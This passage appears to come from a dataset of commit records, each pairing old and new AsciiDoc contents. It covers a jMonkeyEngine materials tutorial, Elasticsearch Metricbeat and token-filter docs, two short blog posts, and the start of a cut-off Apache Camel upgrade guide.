assetManager.loadTexture(\"Textures\/Terrain\/Pond\/Pond_normal.png\"));\n----\n\n.. Set the Material's Shininess to a value between 1 and 128. For a rock, a low fuzzy shininess is appropriate. Use material colors to define the shiny Specular color.\n+\n[source,java]\n----\n\n sphereMat.setBoolean(\"UseMaterialColors\",true);\n sphereMat.setColor(\"Diffuse\",ColorRGBA.White); \/\/ minimum material color\n sphereMat.setColor(\"Specular\",ColorRGBA.White); \/\/ for shininess\n sphereMat.setFloat(\"Shininess\", 64f); \/\/ [1,128] for shininess\n----\n\n\n. Assign your newly created material to the Geometry.\n+\n[source,java]\n----\n\n sphereGeo.setMaterial(sphereMat);\n----\n\n. Let's move and rotate the geometry a bit to position it better.\n+\n[source,java]\n----\n\n sphereGeo.setLocalTranslation(0,2,-2); \/\/ Move it a bit\n sphereGeo.rotate(1.6f, 0, 0); \/\/ Rotate it a bit\n rootNode.attachChild(sphereGeo);\n----\n\n\nRemember that any Lighting.j3md-based material requires a light source, as shown in the full code sample above.\n\n\n\n[TIP]\n====\nTo deactivate Shininess, do not set `Shininess` to 0, but instead set the `Specular` color to `ColorRGBA.Black`.\n====\n\n\n\n== Default Material Definitions\n\nAs you have seen, you can find the following default materials in `jme\/core-data\/Common\/MatDefs\/\u2026`.\n[cols=\"20,40,40\", options=\"header\"]\n|===\n\na| Default Definition\na| Usage\n<a| Parameters\n\na| `Misc\/Unshaded.j3md`\na| Colored: Use with mat.setColor() and ColorRGBA. 
+\nTextured: Use with mat.setTexture() and Texture.\na| Color : Color +\nColorMap : Texture2D\n\n<a| `Light\/Lighting.j3md`\na| Use with shiny Textures, Bump- and NormalMaps textures. +\nRequires a light source.\na| Ambient, Diffuse, Specular : Color +\nDiffuseMap, NormalMap, SpecularMap : Texture2D +\nShininess : Float\n\n|===\n\nFor a game, you create custom Materials based on these existing MaterialDefintions \u2013 as you have just seen in the example with the shiny rock's material.\n\n\n== Exercises\n\n\n=== Exercise 1: Custom .j3m Material\n\nLook at the shiny rocky sphere above again. It takes several lines to create and set the Material.\n\n* Note how it loads the `Lighting.j3md` Material definition.\n* Note how it sets the `DiffuseMap` and `NormalMap` to a texture path.\n* Note how it activates `UseMaterialColors` and sets `Specular` and `Diffuse` to 4 float values (RGBA color).\n* Note how it sets `Shininess` to 64.\n\nIf you want to use one custom material for several models, you can store it in a .j3m file, and save a few lines of code every time.\n\nYou create a j3m file as follows:\n\n. Create a plain text file `assets\/Materials\/MyCustomMaterial.j3m` in your project directory, with the following content:\n+\n[source]\n----\nMaterial My shiny custom material : Common\/MatDefs\/Light\/Lighting.j3md {\n MaterialParameters {\n DiffuseMap : Textures\/Terrain\/Pond\/Pond.jpg\n NormalMap : Textures\/Terrain\/Pond\/Pond_normal.png\n UseMaterialColors : true\n Specular : 1.0 1.0 1.0 1.0\n Diffuse : 1.0 1.0 1.0 1.0\n Shininess : 64.0\n }\n}\n\n----\n\n** Note that `Material` is a fixed keyword.\n** Note that `My shiny custom material` is a String that you can choose to describe the material.\n** Note how the code sets all the same properties as before!\n\n. In the code sample, comment out the eight lines that have `sphereMat` in them.\n. Below this line, add the following line:\n+\n[source,java]\n----\nsphereGeo.setMaterial((Material) assetManager.loadMaterial(\n \"Materials\/MyCustomMaterial.j3m\"));\n\n----\n\n. Run the app. The result is the same.\n\nUsing this new custom material `MyCustomMaterial.j3m` only takes one line. You have replaced the eight lines of an on-the-fly material definition with one line that loads a custom material from a file. Using .j3m files is very handy if you use the same material often.\n\n\n=== Exercise 2: Bumpiness and Shininess\n\nGo back to the bumpy rock sample above:\n\n. Comment out the DiffuseMap line, and run the app. (Uncomment it again.)\n** Which property of the rock is lost?\n\n. Comment out the NormalMap line, and run the app. (Uncomment it again.)\n** Which property of the rock is lost?\n\n. Change the value of Shininess to values like 0, 63, 127.\n** What aspect of the Shininess changes?\n\n\n\n== Conclusion\n\nYou have learned how to create a Material, specify its properties, and use it on a Geometry. You know how to load an image file (.png, .jpg) as texture into a material. You know to save texture files in a subfolder of your project's `assets\/Textures\/` directory.\n\nYou have also learned that a material can be stored in a .j3m file. The file references a built-in MaterialDefinition and specifies values for properties of that MaterialDefinition. 
You know to save your custom .j3m files in your project's `assets\/Materials\/` directory.\n\n*See also:*\n\n* xref:ROOT:jme3\/intermediate\/how_to_use_materials.adoc[How to Use Materials]\n* xref:ROOT:sdk\/material_editing.adoc[Material Editing]\n* link:https:\/\/hub.jmonkeyengine.org\/t\/jmonkeyengine3-material-system-full-explanation\/12947[Materials] forum thread\n\/\/* link:http:\/\/nbviewer.jupyter.org\/github\/jMonkeyEngine\/wiki\/blob\/master\/src\/docs\/resources\/tutorials\/material\/jME3_materials.pdf[jME3 Materials documentation (PDF)]\n* link:http:\/\/www.youtube.com\/watch?v=Feu3-mrpolc[Video Tutorial: Editing and Assigning Materials to Models in jMonkeyEngine SDK (from 2010, is there a newer one?]\n* link:https:\/\/www.blender.org\/support\/tutorials\/[Creating textures in Blender]\n* link:http:\/\/www.shaders.co.uk\/ifw2_textures\/whatsin10.htm[Various Material screenshots] (Not done with JME3, this is just to show the fantastic range of Material parameters in the hands of an expert, until we have a JME3 demo for it.)\n","returncode":0,"stderr":"","license":"cc0-1.0","lang":"AsciiDoc"} {"commit":"f6822823662482d1806ee2518e380979a85a4482","subject":"[DOCS] Disable Metricbeat system module (#42601)","message":"[DOCS] Disable Metricbeat system module (#42601)\n\n","repos":"strapdata\/elassandra,strapdata\/elassandra,strapdata\/elassandra,vroyer\/elassandra,vroyer\/elassandra,vroyer\/elassandra,strapdata\/elassandra,strapdata\/elassandra","old_file":"docs\/reference\/monitoring\/configuring-metricbeat.asciidoc","new_file":"docs\/reference\/monitoring\/configuring-metricbeat.asciidoc","new_contents":"[role=\"xpack\"]\n[testenv=\"gold\"]\n[[configuring-metricbeat]]\n=== Collecting {es} monitoring data with {metricbeat}\n\n[subs=\"attributes\"]\n++++\n<titleabbrev>Collecting monitoring data with {metricbeat}<\/titleabbrev>\n++++\n\nIn 6.5 and later, you can use {metricbeat} to collect data about {es} \nand ship it to the monitoring cluster, rather than routing it through exporters \nas described in <<collecting-monitoring-data>>. \n\nimage::monitoring\/images\/metricbeat.png[Example monitoring architecture]\n\nTo learn about monitoring in general, see \n{stack-ov}\/xpack-monitoring.html[Monitoring the {stack}]. \n\n\/\/NOTE: The tagged regions are re-used in the Stack Overview.\n\n. Enable the collection of monitoring data.\n+\n--\n\/\/ tag::enable-collection[]\nSet `xpack.monitoring.collection.enabled` to `true` on each node in the\nproduction cluster. By default, it is disabled (`false`). \n\nNOTE: You can specify this setting in either the `elasticsearch.yml` on each \nnode or across the cluster as a dynamic cluster setting. If {es} \n{security-features} are enabled, you must have `monitor` cluster privileges to \nview the cluster settings and `manage` cluster privileges to change them.\n\nFor example, you can use the following APIs to review and change this setting:\n\n[source,js]\n----------------------------------\nGET _cluster\/settings\n\nPUT _cluster\/settings\n{\n \"persistent\": {\n \"xpack.monitoring.collection.enabled\": true\n }\n}\n----------------------------------\n\/\/ CONSOLE \n\/\/ end::enable-collection[]\nFor more information, see <<monitoring-settings>> and <<cluster-update-settings>>.\n--\n\n. 
Disable the default collection of {es} monitoring metrics.\n+\n--\n\/\/ tag::disable-default-collection[]\nSet `xpack.monitoring.elasticsearch.collection.enabled` to `false` on each node\nin the production cluster.\n\nNOTE: You can specify this setting in either the `elasticsearch.yml` on each \nnode or across the cluster as a dynamic cluster setting. If {es} \n{security-features} are enabled, you must have `monitor` cluster privileges to \nview the cluster settings and `manage` cluster privileges to change them.\n\nFor example, you can use the following API to change this setting:\n\n[source,js]\n----------------------------------\nPUT _cluster\/settings\n{\n \"persistent\": {\n \"xpack.monitoring.elasticsearch.collection.enabled\": false\n }\n}\n----------------------------------\n\/\/ CONSOLE\n\nLeave `xpack.monitoring.enabled` set to its default value (`true`). \n\/\/ end::disable-default-collection[]\n--\n\n. {metricbeat-ref}\/metricbeat-installation.html[Install {metricbeat}] on each\n{es} node in the production cluster.\n\n. Enable the {es} module in {metricbeat} on each {es} node. +\n+\n--\n\/\/ tag::enable-es-module[]\nFor example, to enable the default configuration in the `modules.d` directory, \nrun the following command:\n\n[\"source\",\"sh\",subs=\"attributes,callouts\"]\n----------------------------------------------------------------------\nmetricbeat modules enable elasticsearch\n----------------------------------------------------------------------\n\nFor more information, see \n{metricbeat-ref}\/configuration-metricbeat.html[Specify which modules to run] and \n{metricbeat-ref}\/metricbeat-module-elasticsearch.html[{es} module]. \n\n\/\/ end::enable-es-module[]\n--\n\n. Configure the {es} module in {metricbeat}. +\n+\n--\nFor example, specify the following settings in the `modules.d\/elasticsearch.yml`\nfile:\n\n[source,yaml]\n----------------------------------\n- module: elasticsearch\n metricsets:\n - ccr\n - cluster_stats\n - index\n - index_recovery\n - index_summary\n - ml_job\n - node_stats\n - shard\n period: 10s\n hosts: [\"http:\/\/localhost:9200\"] \n #username: \"user\"\n #password: \"secret\"\n xpack.enabled: true \n----------------------------------\n\nBy default, the module collects {es} monitoring metrics from\n`http:\/\/localhost:9200`. If that host and port number are not correct, you must\nupdate the `hosts` setting. If you configured {es} to use encrypted\ncommunications, you must access it via HTTPS. For example, use a `hosts` setting like `https:\/\/localhost:9200`.\n\/\/ end::configure-es-module[]\n\n\/\/ tag::remote-monitoring-user[]\nIf Elastic {security-features} are enabled, you must also provide a user ID \nand password so that {metricbeat} can collect metrics successfully: \n\n.. Create a user on the production cluster that has the \n{stack-ov}\/built-in-roles.html[`remote_monitoring_collector` built-in role]. \nAlternatively, use the {stack-ov}\/built-in-users.html[`remote_monitoring_user` built-in user].\n\n.. Add the `username` and `password` settings to the {es} module configuration \nfile.\n\/\/ end::remote-monitoring-user[]\n--\n\n. Optional: Disable the system module in {metricbeat}.\n+\n--\n\/\/ tag::disable-system-module[]\nBy default, the {metricbeat-ref}\/metricbeat-module-system.html[system module] is\nenabled. The information it collects, however, is not shown on the *Monitoring*\npage in {kib}. 
Unless you want to use that information for other purposes, run\nthe following command:\n\n[\"source\",\"sh\",subs=\"attributes,callouts\"]\n----------------------------------------------------------------------\nmetricbeat modules disable system\n----------------------------------------------------------------------\n\n\/\/ end::disable-system-module[] \n--\n\n. Identify where to send the monitoring data. +\n+\n--\nTIP: In production environments, we strongly recommend using a separate cluster \n(referred to as the _monitoring cluster_) to store the data. Using a separate \nmonitoring cluster prevents production cluster outages from impacting your \nability to access your monitoring data. It also prevents monitoring activities \nfrom impacting the performance of your production cluster.\n\nFor example, specify the {es} output information in the {metricbeat} \nconfiguration file (`metricbeat.yml`):\n\n[source,yaml]\n----------------------------------\noutput.elasticsearch:\n # Array of hosts to connect to.\n hosts: [\"http:\/\/es-mon-1:9200\", \"http:\/\/es-mon-2:9200\"] <1>\n \n # Optional protocol and basic auth credentials.\n #protocol: \"https\"\n #username: \"elastic\"\n #password: \"changeme\" \n----------------------------------\n<1> In this example, the data is stored on a monitoring cluster with nodes \n`es-mon-1` and `es-mon-2`.\n\nIf you configured the monitoring cluster to use encrypted communications, you\nmust access it via HTTPS. For example, use a `hosts` setting like\n`https:\/\/es-mon-1:9200`.\n\nIMPORTANT: The {es} {monitor-features} use ingest pipelines, therefore the\ncluster that stores the monitoring data must have at least one \n<<ingest,ingest node>>. \n\nIf {es} {security-features} are enabled on the monitoring cluster, you \nmust provide a valid user ID and password so that {metricbeat} can send metrics \nsuccessfully. \n\n.. Create a user on the monitoring cluster that has the \n{stack-ov}\/built-in-roles.html[`remote_monitoring_agent` built-in role]. \nAlternatively, use the \n{stack-ov}\/built-in-users.html[`remote_monitoring_user` built-in user].\n\n.. Add the `username` and `password` settings to the {es} output information in \nthe {metricbeat} configuration file.\n\nFor more information about these configuration options, see \n{metricbeat-ref}\/elasticsearch-output.html[Configure the {es} output].\n--\n\n. <<starting-elasticsearch,Start {es}>> on each node.\n\n. {metricbeat-ref}\/metricbeat-starting.html[Start {metricbeat}] on each node. \n\n. {kibana-ref}\/monitoring-data.html[View the monitoring data in {kib}]. \n","old_contents":"[role=\"xpack\"]\n[testenv=\"gold\"]\n[[configuring-metricbeat]]\n=== Collecting {es} monitoring data with {metricbeat}\n\n[subs=\"attributes\"]\n++++\n<titleabbrev>Collecting monitoring data with {metricbeat}<\/titleabbrev>\n++++\n\nIn 6.5 and later, you can use {metricbeat} to collect data about {es} \nand ship it to the monitoring cluster, rather than routing it through exporters \nas described in <<collecting-monitoring-data>>. \n\nimage::monitoring\/images\/metricbeat.png[Example monitoring architecture]\n\nTo learn about monitoring in general, see \n{stack-ov}\/xpack-monitoring.html[Monitoring the {stack}]. \n\n\/\/NOTE: The tagged regions are re-used in the Stack Overview.\n\n. Enable the collection of monitoring data.\n+\n--\n\/\/ tag::enable-collection[]\nSet `xpack.monitoring.collection.enabled` to `true` on each node in the\nproduction cluster. By default, it is is disabled (`false`). 
\n\nNOTE: You can specify this setting in either the `elasticsearch.yml` on each \nnode or across the cluster as a dynamic cluster setting. If {es} \n{security-features} are enabled, you must have `monitor` cluster privileges to \nview the cluster settings and `manage` cluster privileges to change them.\n\nFor example, you can use the following APIs to review and change this setting:\n\n[source,js]\n----------------------------------\nGET _cluster\/settings\n\nPUT _cluster\/settings\n{\n \"persistent\": {\n \"xpack.monitoring.collection.enabled\": true\n }\n}\n----------------------------------\n\/\/ CONSOLE \n\/\/ end::enable-collection[]\nFor more information, see <<monitoring-settings>> and <<cluster-update-settings>>.\n--\n\n. Disable the default collection of {es} monitoring metrics.\n+\n--\n\/\/ tag::disable-default-collection[]\nSet `xpack.monitoring.elasticsearch.collection.enabled` to `false` on each node\nin the production cluster.\n\nNOTE: You can specify this setting in either the `elasticsearch.yml` on each \nnode or across the cluster as a dynamic cluster setting. If {es} \n{security-features} are enabled, you must have `monitor` cluster privileges to \nview the cluster settings and `manage` cluster privileges to change them.\n\nFor example, you can use the following API to change this setting:\n\n[source,js]\n----------------------------------\nPUT _cluster\/settings\n{\n \"persistent\": {\n \"xpack.monitoring.elasticsearch.collection.enabled\": false\n }\n}\n----------------------------------\n\/\/ CONSOLE\n\nLeave `xpack.monitoring.enabled` set to its default value (`true`). \n\/\/ end::disable-default-collection[]\n--\n\n. {metricbeat-ref}\/metricbeat-installation.html[Install {metricbeat}] on each\n{es} node in the production cluster.\n\n. Enable the {es} module in {metricbeat} on each {es} node. +\n+\n--\n\/\/ tag::enable-es-module[]\nFor example, to enable the default configuration in the `modules.d` directory, \nrun the following command:\n\n[\"source\",\"sh\",subs=\"attributes,callouts\"]\n----------------------------------------------------------------------\nmetricbeat modules enable elasticsearch\n----------------------------------------------------------------------\n\nFor more information, see \n{metricbeat-ref}\/configuration-metricbeat.html[Specify which modules to run] and \n{metricbeat-ref}\/metricbeat-module-elasticsearch.html[{es} module]. \n\n\/\/ end::enable-es-module[]\n--\n\n. Configure the {es} module in {metricbeat}. +\n+\n--\nFor example, specify the following settings in the `modules.d\/elasticsearch.yml`\nfile:\n\n[source,yaml]\n----------------------------------\n- module: elasticsearch\n metricsets:\n - ccr\n - cluster_stats\n - index\n - index_recovery\n - index_summary\n - ml_job\n - node_stats\n - shard\n period: 10s\n hosts: [\"http:\/\/localhost:9200\"] \n #username: \"user\"\n #password: \"secret\"\n xpack.enabled: true \n----------------------------------\n\nBy default, the module collects {es} monitoring metrics from\n`http:\/\/localhost:9200`. If that host and port number are not correct, you must\nupdate the `hosts` setting. If you configured {es} to use encrypted\ncommunications, you must access it via HTTPS. For example, use a `hosts` setting like `https:\/\/localhost:9200`.\n\/\/ end::configure-es-module[]\n\n\/\/ tag::remote-monitoring-user[]\nIf Elastic {security-features} are enabled, you must also provide a user ID \nand password so that {metricbeat} can collect metrics successfully: \n\n.. 
Create a user on the production cluster that has the \n{stack-ov}\/built-in-roles.html[`remote_monitoring_collector` built-in role]. \nAlternatively, use the {stack-ov}\/built-in-users.html[`remote_monitoring_user` built-in user].\n\n.. Add the `username` and `password` settings to the {es} module configuration \nfile.\n\/\/ end::remote-monitoring-user[]\n--\n\n. Identify where to send the monitoring data. +\n+\n--\nTIP: In production environments, we strongly recommend using a separate cluster \n(referred to as the _monitoring cluster_) to store the data. Using a separate \nmonitoring cluster prevents production cluster outages from impacting your \nability to access your monitoring data. It also prevents monitoring activities \nfrom impacting the performance of your production cluster.\n\nFor example, specify the {es} output information in the {metricbeat} \nconfiguration file (`metricbeat.yml`):\n\n[source,yaml]\n----------------------------------\noutput.elasticsearch:\n # Array of hosts to connect to.\n hosts: [\"http:\/\/es-mon-1:9200\", \"http:\/\/es-mon2:9200\"] <1>\n \n # Optional protocol and basic auth credentials.\n #protocol: \"https\"\n #username: \"elastic\"\n #password: \"changeme\" \n----------------------------------\n<1> In this example, the data is stored on a monitoring cluster with nodes \n`es-mon-1` and `es-mon-2`.\n\nIf you configured the monitoring cluster to use encrypted communications, you\nmust access it via HTTPS. For example, use a `hosts` setting like\n`https:\/\/es-mon-1:9200`.\n\nIMPORTANT: The {es} {monitor-features} use ingest pipelines, therefore the\ncluster that stores the monitoring data must have at least one \n<<ingest,ingest node>>. \n\nIf {es} {security-features} are enabled on the monitoring cluster, you \nmust provide a valid user ID and password so that {metricbeat} can send metrics \nsuccessfully. \n\n.. Create a user on the monitoring cluster that has the \n{stack-ov}\/built-in-roles.html[`remote_monitoring_agent` built-in role]. \nAlternatively, use the \n{stack-ov}\/built-in-users.html[`remote_monitoring_user` built-in user].\n\n.. Add the `username` and `password` settings to the {es} output information in \nthe {metricbeat} configuration file.\n\nFor more information about these configuration options, see \n{metricbeat-ref}\/elasticsearch-output.html[Configure the {es} output].\n--\n\n. <<starting-elasticsearch,Start {es}>> on each node.\n\n. {metricbeat-ref}\/metricbeat-starting.html[Start {metricbeat}] on each node. \n\n. {kibana-ref}\/monitoring-data.html[View the monitoring data in {kib}]. 
\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"b4c80a2c8683ef18441c1d158446e2b106b44723","subject":"Update 2015-10-15-Seeking-the-best-wireframing-web-tool-for-mobile-App.adoc","message":"Update 2015-10-15-Seeking-the-best-wireframing-web-tool-for-mobile-App.adoc","repos":"fastretailing\/blog,fastretailing\/blog,fastretailing\/blog","old_file":"_posts\/2015-10-15-Seeking-the-best-wireframing-web-tool-for-mobile-App.adoc","new_file":"_posts\/2015-10-15-Seeking-the-best-wireframing-web-tool-for-mobile-App.adoc","new_contents":"= Seeking the best wireframing web tool for mobile App\n\nMaking prototyping or wireframing your idea is significantly important process for designing mobile app.\n\n== Prott\nhttps:\/\/prottapp.com\n\n== atomic\nhttps:\/\/atomic.io\/\n\n== MockingBot\nhttps:\/\/mockingbot.com\/\n\n","old_contents":"= Seeking the best wireframing web tool for mobile App\n\nMaking prototyping or wire framing your idea is significantly important process for designing mobile app.\n\n== Prott\nhttps:\/\/prottapp.com\n\n== atomic\nhttps:\/\/atomic.io\/\n\n== MockingBot\nhttps:\/\/mockingbot.com\/\n\n","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} {"commit":"0571620ca3200d32c4d38aecd43ec2df48833f3e","subject":"Update 2016-03-22-Subgraph-a-featherweight-O-S-for-non-technical-users.adoc","message":"Update 2016-03-22-Subgraph-a-featherweight-O-S-for-non-technical-users.adoc","repos":"fwalloe\/infosecbriefly,fwalloe\/infosecbriefly,fwalloe\/infosecbriefly,fwalloe\/infosecbriefly","old_file":"_posts\/2016-03-22-Subgraph-a-featherweight-O-S-for-non-technical-users.adoc","new_file":"_posts\/2016-03-22-Subgraph-a-featherweight-O-S-for-non-technical-users.adoc","new_contents":":hp-tags: Subgraph, linux, OS, operating system, news\n\n= Subgraph - a featherweight OS for non-technical users\n\nThe Debian-based Subgraph OS, first released in 2015, is a featherweight open-source solution that comes with all the security and privacy options pre-configured so that non-technical users abandon Windows without the hassle that \n\n[horizontal]\n.Key features\nFull Disk Encryption:: On by default\nTor:: All traffic goes through it\nApplication sandboxing:: Using Containe\nSystem and Kernel Security:: Grssecurity+++\nSecure Mail Services:: With simple PGP key management\n\n","old_contents":":hp-tags: Subgraph, linux, OS, operating system, news\n\n= Subgraph - a featherweight OS for non-technical users\n\nThe Debian-based Subgraph OS, first released in 2015, is a featherweight open-source solution that comes with all the security and privacy options pre-configured so that non-technical users abandon Windows without the hassle that \n\n[horizontal]\n.Key features\nFull Disk Encryption:: On by default\nTor:: All traffic goes through it\nApplication sandboxing:: using Containe\nSystem and Kernel Security:: Grssecurity+++\nSecure Mail Services:: with simple PGP key management\n\n","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} {"commit":"90e139e2526e14dd43b3b998a596e66b23458df0","subject":"[DOCS] Reformat uppercase token filter docs (#50555)","message":"[DOCS] Reformat uppercase token filter docs (#50555)\n\n* Updates the description and adds a Lucene link\r\n* Adds analyze and custom analyzer 
snippets\r\n","repos":"HonzaKral\/elasticsearch,GlenRSmith\/elasticsearch,uschindler\/elasticsearch,scorpionvicky\/elasticsearch,GlenRSmith\/elasticsearch,uschindler\/elasticsearch,uschindler\/elasticsearch,scorpionvicky\/elasticsearch,GlenRSmith\/elasticsearch,HonzaKral\/elasticsearch,uschindler\/elasticsearch,nknize\/elasticsearch,robin13\/elasticsearch,gingerwizard\/elasticsearch,GlenRSmith\/elasticsearch,scorpionvicky\/elasticsearch,nknize\/elasticsearch,HonzaKral\/elasticsearch,gingerwizard\/elasticsearch,gingerwizard\/elasticsearch,gingerwizard\/elasticsearch,nknize\/elasticsearch,nknize\/elasticsearch,robin13\/elasticsearch,uschindler\/elasticsearch,gingerwizard\/elasticsearch,robin13\/elasticsearch,nknize\/elasticsearch,gingerwizard\/elasticsearch,scorpionvicky\/elasticsearch,GlenRSmith\/elasticsearch,scorpionvicky\/elasticsearch,HonzaKral\/elasticsearch,robin13\/elasticsearch,robin13\/elasticsearch,gingerwizard\/elasticsearch","old_file":"docs\/reference\/analysis\/tokenfilters\/uppercase-tokenfilter.asciidoc","new_file":"docs\/reference\/analysis\/tokenfilters\/uppercase-tokenfilter.asciidoc","new_contents":"[[analysis-uppercase-tokenfilter]]\n=== Uppercase token filter\n++++\n<titleabbrev>Uppercase<\/titleabbrev>\n++++\n\nChanges token text to uppercase. For example, you can use the `uppercase` filter\nto change `the Lazy DoG` to `THE LAZY DOG`.\n\nThis filter uses Lucene's\nhttps:\/\/lucene.apache.org\/core\/{lucene_version_path}\/analyzers-common\/org\/apache\/lucene\/analysis\/core\/UpperCaseFilter.html[UpperCaseFilter].\n\n[WARNING]\n====\nDepending on the language, an uppercase character can map to multiple\nlowercase characters. Using the `uppercase` filter could result in the loss of\nlowercase character information.\n\nTo avoid this loss but still have a consistent lettercase, use the <<analysis-lowercase-tokenfilter,`lowercase`>> filter instead.\n====\n\n[[analysis-uppercase-tokenfilter-analyze-ex]]\n==== Example\n\nThe following <<indices-analyze,analyze API>> request uses the default\n`uppercase` filter to change the `the Quick FoX JUMPs` to uppercase:\n\n[source,console]\n--------------------------------------------------\nGET _analyze\n{\n \"tokenizer\" : \"standard\",\n \"filter\" : [\"uppercase\"],\n \"text\" : \"the Quick FoX JUMPs\"\n}\n--------------------------------------------------\n\nThe filter produces the following tokens:\n\n[source,text]\n--------------------------------------------------\n[ THE, QUICK, FOX, JUMPS ]\n--------------------------------------------------\n\n\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\n[source,console-result]\n--------------------------------------------------\n{\n \"tokens\" : [\n {\n \"token\" : \"THE\",\n \"start_offset\" : 0,\n \"end_offset\" : 3,\n \"type\" : \"<ALPHANUM>\",\n \"position\" : 0\n },\n {\n \"token\" : \"QUICK\",\n \"start_offset\" : 4,\n \"end_offset\" : 9,\n \"type\" : \"<ALPHANUM>\",\n \"position\" : 1\n },\n {\n \"token\" : \"FOX\",\n \"start_offset\" : 10,\n \"end_offset\" : 13,\n \"type\" : \"<ALPHANUM>\",\n \"position\" : 2\n },\n {\n \"token\" : \"JUMPS\",\n \"start_offset\" : 14,\n \"end_offset\" : 19,\n \"type\" : \"<ALPHANUM>\",\n \"position\" : 3\n }\n ]\n}\n--------------------------------------------------\n\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\n\n[[analysis-uppercase-tokenfilter-analyzer-ex]]\n==== Add to an analyzer\n\nThe following <<indices-create-index,create index API>> request uses the\n`uppercase` filter to configure a new \n<<analysis-custom-analyzer,custom 
analyzer>>.\n\n[source,console]\n--------------------------------------------------\nPUT uppercase_example\n{\n \"settings\" : {\n \"analysis\" : {\n \"analyzer\" : {\n \"whitespace_uppercase\" : {\n \"tokenizer\" : \"whitespace\",\n \"filter\" : [\"uppercase\"]\n }\n }\n }\n }\n}\n--------------------------------------------------\n","old_contents":"[[analysis-uppercase-tokenfilter]]\n=== Uppercase token filter\n++++\n<titleabbrev>Uppercase<\/titleabbrev>\n++++\n\nA token filter of type `uppercase` that normalizes token text to upper\ncase.\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"5bf00232b6ad3572f2c815e8db2c17e6fc5b35c3","subject":"CAMEL-15164: camel-lra-starter - Use same keys in auto configuration as camel-main: camel.service.lra -> camel.lra","message":"CAMEL-15164: camel-lra-starter - Use same keys in auto configuration as camel-main: camel.service.lra -> camel.lra\n","repos":"nicolaferraro\/camel,gnodet\/camel,tadayosi\/camel,christophd\/camel,tdiesler\/camel,mcollovati\/camel,pmoerenhout\/camel,pmoerenhout\/camel,cunningt\/camel,christophd\/camel,cunningt\/camel,apache\/camel,cunningt\/camel,adessaigne\/camel,mcollovati\/camel,tdiesler\/camel,pax95\/camel,pmoerenhout\/camel,gnodet\/camel,christophd\/camel,alvinkwekel\/camel,pax95\/camel,adessaigne\/camel,pax95\/camel,alvinkwekel\/camel,nikhilvibhav\/camel,apache\/camel,pmoerenhout\/camel,tdiesler\/camel,tdiesler\/camel,pax95\/camel,tdiesler\/camel,nicolaferraro\/camel,christophd\/camel,gnodet\/camel,apache\/camel,alvinkwekel\/camel,gnodet\/camel,nikhilvibhav\/camel,tadayosi\/camel,gnodet\/camel,cunningt\/camel,tdiesler\/camel,tadayosi\/camel,nicolaferraro\/camel,pmoerenhout\/camel,mcollovati\/camel,mcollovati\/camel,pax95\/camel,tadayosi\/camel,nikhilvibhav\/camel,alvinkwekel\/camel,tadayosi\/camel,adessaigne\/camel,apache\/camel,cunningt\/camel,pax95\/camel,christophd\/camel,adessaigne\/camel,adessaigne\/camel,cunningt\/camel,nicolaferraro\/camel,tadayosi\/camel,nikhilvibhav\/camel,apache\/camel,pmoerenhout\/camel,adessaigne\/camel,apache\/camel,christophd\/camel","old_file":"docs\/user-manual\/modules\/ROOT\/pages\/camel-3x-upgrade-guide-3_4.adoc","new_file":"docs\/user-manual\/modules\/ROOT\/pages\/camel-3x-upgrade-guide-3_4.adoc","new_contents":"= Apache Camel 3.x Upgrade Guide\n\nThis document is for helping you upgrade your Apache Camel application\nfrom Camel 3.x to 3.y. 
For example, if you are upgrading Camel 3.0 to 3.2, then you should follow the guides\nfrom both 3.0 to 3.1 and 3.1 to 3.2.\n\n== Upgrading Camel 3.3 to 3.4\n\n=== camel-test and JMX\n\nThe `camel-test` module no longer has a dependency on `camel-management` out of the box.\nIn Camel, JMX is optional; to use JMX, `camel-management` must be added as a dependency.\n\nFor example, to use JMX during testing, add the following dependency in test scope:\n\n[source,xml]\n----\n<dependency>\n <groupId>org.apache.camel<\/groupId>\n <artifactId>camel-management<\/artifactId>\n <scope>test<\/scope>\n<\/dependency>\n----\n\n=== Health Check\n\nThe default health check implementation has been moved out of `camel-base` into `camel-health` as a separate module.\nThe health check has been refactored and there are some APIs and classes that have been changed.\nThe health check in `camel-consul` has been removed.\n\nThe old health check was not fully implemented and was only targeting Spring Boot.\nThe new system is more generic and supports all Camel runtimes.\n\nAn example is provided in `camel-example-main-health`.\n\n=== Template components\n\nThe template components, which allow access to the current `Exchange` and `CamelContext` API\nfrom the context map available for templating, have now been restricted to only the message body and headers.\n\nThis option can be enabled (`allowContextMapAll=true`) for full access to the current Exchange and CamelContext.\nDoing so imposes a potential security risk as this opens access to the full power of the CamelContext API.\n\nThis applies to the following templating components: camel-freemarker, camel-velocity, camel-mvel, camel-mustache,\ncamel-string-template, camel-chunk, camel-robotframework.\n\n=== Using custom language in RouteBuilder\n\nThe Java DSL `RouteBuilder` allows referring to a custom language as shown below:\n\n[source,java]\n----\nfrom(\"direct:start\")\n .filter(language(\"foo\", \"Bla bla bla\"))\n .to(\"mock:camel\");\n----\n\nThis functionality is seldom in use, as you would use the provided languages from Camel.\nIf using, then the `language` method now requires a static import as shown below:\n\n[source,java]\n----\nimport static org.apache.camel.builder.Builder.language;\n----\n\n=== camel-spring-boot\n\nThe `\/actuator\/camelroutes` HTTP endpoint has been removed from the provided Spring Boot actuators in `camel-spring-boot`.\nThis actuator was becoming problematic to maintain during Spring Boot upgrades due to changes in Spring Boot.\n\n=== camel-servlet and camel-http-common\n\n`HttpRegistry` and `DefaultHttpRegistry` classes are moved from camel-servlet into camel-http-common.\n`HttpRegistryProvider` is added and used in `DefaultHttpRegistry` instead of `CamelServlet`.\n\nThese changes had effects on camel-atmosphere-websocket and camel-servlet and also camel-resteasy.\nUsers of these components who have custom implementations of `DefaultHttpRegistry` or use the `CamelServlet` class should take this change into account.\n\n=== camel-sql\n\nThe `JdbcAggregationRepository` optimistic locking feature has been fixed to work in a distributed environment and with every database.\nThere is a new `version` column that is required and must be added to the repository:\n\n[source,sql]\n----\nCREATE TABLE aggregation (\n id varchar(255) NOT NULL,\n exchange blob NOT NULL,\n version BIGINT NOT NULL,\n constraint aggregation_pk PRIMARY KEY (id)\n);\nCREATE TABLE aggregation_completed (\n id varchar(255) NOT NULL,\n exchange blob NOT 
